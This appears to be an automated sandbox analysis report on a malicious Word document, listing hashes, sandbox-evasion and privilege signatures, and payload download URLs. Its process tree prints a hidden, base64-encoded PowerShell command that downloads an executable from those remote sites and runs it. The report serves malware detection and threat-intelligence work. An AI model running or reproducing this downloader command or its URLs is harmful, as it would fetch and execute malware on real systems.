Analysis
-
max time kernel
133s -
max time network
137s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
20-11-2024 22:41
Behavioral task
behavioral1
Sample
a0286161a13b0ac162da0033db923c453cb4073f50c3091a6fef75f344fc4e35.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
a0286161a13b0ac162da0033db923c453cb4073f50c3091a6fef75f344fc4e35.doc
Resource
win10v2004-20241007-en
General
-
Target
a0286161a13b0ac162da0033db923c453cb4073f50c3091a6fef75f344fc4e35.doc
-
Size
181KB
-
MD5
c87b8d603c1bbb68f7043b828d4f33d2
-
SHA1
9212853008d9740e1be2f2bc211160ac3a93d15f
-
SHA256
a0286161a13b0ac162da0033db923c453cb4073f50c3091a6fef75f344fc4e35
-
SHA512
8919fba1472d8b8cb175cab9b59414b4ba9b213bed93576cbedff9d73dabbc2703c597f3723b6a12991801be63765233bba7c3d032216206c48b78c5834dc7d3
-
SSDEEP
3072:6FOa2y/GdyDktGDWLS0HZWD5w8K7Nk9ND7IBUd5xKu/UW:COa2k43tGiL3HJk9ND7bdnKu/D
Malware Config
Extracted
http://eilonstrategy.florencesoftwares.com/wp-content/mu/
http://pakiskemenagntb.com/wp-content/4k/
http://ivyfriend.com/ivypal/wp-includes/h20/
http://julianaweb.cordeldigital.com/wp-includes/0vu/
http://itsallinclusive.com/ar/Xd7OiT/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 720 1620 Powershell.exe 84 -
Blocklisted process makes network request 2 IoCs
flow pid Process 27 720 Powershell.exe 32 720 Powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 720 Powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 1128 WINWORD.EXE 1128 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 720 Powershell.exe 720 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 720 Powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 1128 WINWORD.EXE 1128 WINWORD.EXE 1128 WINWORD.EXE 1128 WINWORD.EXE 1128 WINWORD.EXE 1128 WINWORD.EXE 1128 WINWORD.EXE -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 1128 wrote to memory of 2868 1128 WINWORD.EXE 85 PID 1128 wrote to memory of 2868 1128 WINWORD.EXE 85
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a0286161a13b0ac162da0033db923c453cb4073f50c3091a6fef75f344fc4e35.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABGAHcAZABwAGMAZgBrAG8AbAB0AD0AJwBVAGIAcgBuAGIAaQBkAGoAbwB2AG4AJwA7ACQATgBuAGkAcQB3AGQAdQBmACAAPQAgACcANAA1ADMAJwA7ACQARAB1AGMAeQBiAGkAZgB2AHoAagBiAD0AJwBCAHoAagBzAHEAcQB6AHQAZwB5AGkAYgBtACcAOwAkAEUAZgBlAHcAeQBoAGsAeQBkAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABOAG4AaQBxAHcAZAB1AGYAKwAnAC4AZQB4AGUAJwA7ACQAVwBqAGoAcgBkAG8AYwBxAG0AbQBzAGIAPQAnAEMAaQBtAHYAbABjAGoAZQBkAHcAdgBuAHUAJwA7ACQAQQBxAHcAdwBlAHQAcABxAD0ALgAoACcAbgBlACcAKwAnAHcALQAnACsAJwBvAGIAagBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMAbABJAGUAbgB0ADsAJABVAG4AbgBwAHkAdwBhAGcAeABzAHgAZwA9ACcAaAB0AHQAcAA6AC8ALwBlAGkAbABvAG4AcwB0AHIAYQB0AGUAZwB5AC4AZgBsAG8AcgBlAG4AYwBlAHMAbwBmAHQAdwBhAHIAZQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AbQB1AC8AKgBoAHQAdABwADoALwAvAHAAYQBrAGkAcwBrAGUAbQBlAG4AYQBnAG4AdABiAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ANABrAC8AKgBoAHQAdABwADoALwAvAGkAdgB5AGYAcgBpAGUAbgBkAC4AYwBvAG0ALwBpAHYAeQBwAGEAbAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAMgAwAC8AKgBoAHQAdABwADoALwAvAGoAdQBsAGkAYQBuAGEAdwBlAGIALgBjAG8AcgBkAGUAbABkAGkAZwBpAHQAYQBsAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwAwAHYAdQAvACoAaAB0AHQAcAA6AC8ALwBpAHQAcwBhAGwAbABpAG4AYwBsAHUAcwBpAHYAZQAuAGMAbwBtAC8AYQByAC8AWABkADcATwBpAFQALwAnAC4AIgBzAHAATABgAGkAVAAiACgAJwAqACcAKQA7ACQAVAB4AHAAaABsAHoAcAB6AGoAZABoAHoAagA9ACcAWQBvAHAAdABkAHAAdwBnAGEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAE0AegB4AG0AYQBiAGwAawB5AGMAdgBuACAAaQBuACAAJABVAG4AbgBwAHkAdwBhAGcAeABzAHgAZwApAHsAdAByAHkAewAkAEEAcQB3AHcAZQB0AHAAcQAuACIAZABPAFcAYABOAEwAYABPAEEAZABmAEkAYABsAGUAIgAoACQATQB6AHgAbQBhAGIAbABrAHkAYwB2AG4ALAAgACQARQBmAGUAdwB5AGgAawB5AGQAKQA7ACQAUgBnAG4AdgBxAHUAZQB1AHQAcAA9ACcAWABhAG4AagBjAHMAZQBjAGEAaQB4AHgAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdABlACcAKwAnAG0AJwApACAAJABFAGYAZQB3AHkAaABrAHkAZAApAC4AIgBsAGAARQBuAEcAdABIACIAIAAtAGcAZQAgADIANQAzADgAOAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAGAAVABhAFIAVAAiACgAJABFAGYAZQB3AHkAaABrAHkAZAApADsAJABUAGcAeAByAG8AaQBjAGgAPQAnAE4AbQBuAHUAcABkAHEAdgB1AHMAJwA7AGIAcgBlAGEAawA7ACQARgB0AG8AdwB3AGoAaQBpAHAAbwBzAD0AJwBOAHcAeABvAGwAdQBzAGUAeABwACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEgAbABmAGcAYwBtAGUAaABkAGEAZAA9ACcATQB0AHkAegB3AHkAdAB0AGoAYgBnAHMAJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:720
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444B
MD50797262c833872f7fc89ea81f007f331
SHA1947e5449bd4d7301ed234f4a4538f1976b71a1a2
SHA2561a14016417f85efc7a655c0fe2b4b77da934107ac2692ece033ae181ff999025
SHA5125078d4cee502c3cea192fe0f6d576ad6e079dd1c52c3f357febea28742b0503dd59428865d0eef8596320dec2c627f2179d8749e85b9a655dd0e92d5077f36bb
-
Filesize
245KB
MD5f883b260a8d67082ea895c14bf56dd56
SHA17954565c1f243d46ad3b1e2f1baf3281451fc14b
SHA256ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353
SHA512d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
Filesize2KB
MD5d36ec6b324338a5ecd82e1f8033cffe0
SHA1642fd1e50ee0d17d93c04779e0a9a9d947277826
SHA2561afe7d700c9b9c960ad69ee4be51caf4063798645ad212591fb278d9003d1a29
SHA5128615e9c2f9d047b2acce5f7bd3ca397248f72d4f4b57339a1d378bb7ec5fab16ab9f99c375ba0d6d7ff170487800ea29225cd1933478a4b6622b00b86fb198bb